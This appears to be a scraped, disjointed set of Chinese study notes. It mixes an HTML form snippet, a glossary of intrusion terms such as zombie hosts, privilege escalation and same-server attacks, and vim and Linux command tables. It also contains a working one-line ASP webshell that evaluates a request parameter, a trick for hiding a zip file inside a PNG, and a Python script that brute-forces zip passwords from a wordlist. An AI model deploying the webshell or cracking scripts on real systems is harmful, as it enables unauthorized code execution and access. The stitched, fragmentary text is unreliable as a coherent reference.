代码命令
代码 | 作用 |
---|---|
input type=”text” name=”username” value=”” | 输入账号 |
input type=”text”name=”password” value=”” | 输入密码 |
input type=”submit” | 提交查询按钮 |
input type=”reset” | 重置 |
Keithxodoy
MD5
肉鸡 : 被黑客入侵并长期驻扎的计算机或服务器
漏洞 : 硬件、软件、协议等可利用安全缺陷,对数据进行篡改、控制等
提权 : 操作系统低权限的账户将自己提升为管理员权限使用的方法
跳板 : 使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息
旁站 : 对于一个大的服务器,可以供多个网站使用
旁站入侵 : 同服务器下的网站入侵,可以通过提权跨目录等手段拿到目标网站的权限。
C段入侵 : 同C段下服务器入侵。如目标Ip为192.168.1.253入侵192.168.1.*的任意一台机器,然后借助一些黑客工具嗅探获取网络上传输的各种信息。
渗透测试
黑盒测试不同于黑客攻击,并不等于黑站。黑盒测试考验的是综合的能力 (OS,Database,Script,code,思路,社工)
思路和经验积累往往决定成败
黑盒测试为传统的渗透测试,而白盒测试偏向于代码审计
缺陷: 无法贡献系统
小结
木马:
通过向服务端提交一句简短的代码,配合本地客户端,实现webshell功能的木马
1 | <%eval request("pass")%> |
步骤
作用
将test.txt文件定向隐藏至hide.png文件下,即点击图片,其实打开的是test.txt
代码
cat test.txt.zip >> hide.png
用料:
这里假设filename是一个文件的路径:
1 | import zipfile |
这里使用了z.infolist()
, 它返回的就是压缩包内所有文件的信息,就是一个ZipInfo的列表。一个ZipInfo对象中包含了压缩包内一个文件的信息,其中比较常用的是 filename, file_size, header_offset, 分别为文件名,文件大小,文件数据在压缩包中的偏移
代码1
2
3
4
5import zipfile #导入模块,它是做压缩和解压缩的
password="123" #我们设定的口令
zfile = zipfile.ZipFile("test.zip") #要解压缩的压缩包
zfile.extractall(path='C:\\Users\\Administrator\\Desktop\\', members=zfile.namelist(), pwd=password.encode('utf-8'))
#进行解压缩操作,path为输出的路径
运行一下上面的代码(当然你的加密口令要为123),会发现在桌面上已经把test.zip解压出来了
直接上代码1
2
3
4
5
6
7
8
9
10import zipfile
zfile = zipfile.ZipFile("test.zip")
passFile=open('pwd.txt') #读取你设定的密码文件
for line in passFile.readlines():
try:
password = line.strip('\n')
zfile.extractall(path='C:\\Users\\Administrator\\Desktop\\', members=zfile.namelist(), pwd=password.encode('utf-8'))
break
except:
print("密码错误")
利用了try except异常机制,当解压正常的时候就正常密码正常,解压失败会报出异常
命令 | 功能 |
---|---|
h | 向左 |
j | 向下 |
k | 向上 |
l | 向右 |
行内移动命令 | 作用 |
---|---|
w | 向后移动一个单词 |
b | 向前移动一个单词 |
0 | 迅速回到行首 |
^ | 回到行首,第一个不是空白字符的位置 |
$ | 回到行尾 |
行数移动命令 | 英文 | 作用 |
---|---|---|
gg | go | 回到文件顶部 |
G | GO | 回到文件末尾 |
数字gg | go | 移动到 数字 对应行数 |
数字G | go | 移动到 数字 对应行数 |
:数字 | 移动到 数字 对应行数 |
屏幕移动 | 英文 | 功能 |
---|---|---|
Ctrl+b | back | 向上翻页 |
Ctrl+f | forwarf | 向下翻页 |
ctrl + H | Head | 屏幕顶部 |
ctrl + M | Middle | 屏幕中间 |
ctrl + L | Low | 屏幕底部 |
编辑命令 | 英文 | 作用 |
---|---|---|
i | 进入编辑模式 | |
esc | 退出 | |
y | copy | 复制 |
yy | copy | 复制一行,多行复制可以nyy,如 2 YY |
p | paste | 粘贴 |
u | 撤销上一步的操作 | |
Ctrl+r | 恢复上一步被撤销的操作 | |
dd | Delete | 删除,实际上是剪贴,将删除内容放入文本缓冲区中 |
缩放命令 | |
---|---|
ctrl + shift + = | 放大 |
Ctrl + - | 缩小 |
常用Linux命令 | 英文 | 作用 |
---|---|---|
ls | list | 查看当前文件夹下的内容 |
pwd | print work directory | 查看当前所在文件夹 |
cd | change directory | 切换文件夹 |
touch | touch | 新建文件 |
mkdir | make directory | 创建目录 |
rm [-r] | remove | 删除指定的文件或目录 |
clear | clear | 清屏 |
command [-0ptions] [parameter]
command
: 命令名,相应功能英语缩写-Options
: 选项,可以对命令进行控制,也可以省略parameter
: 传递给命令的参数,可以为多个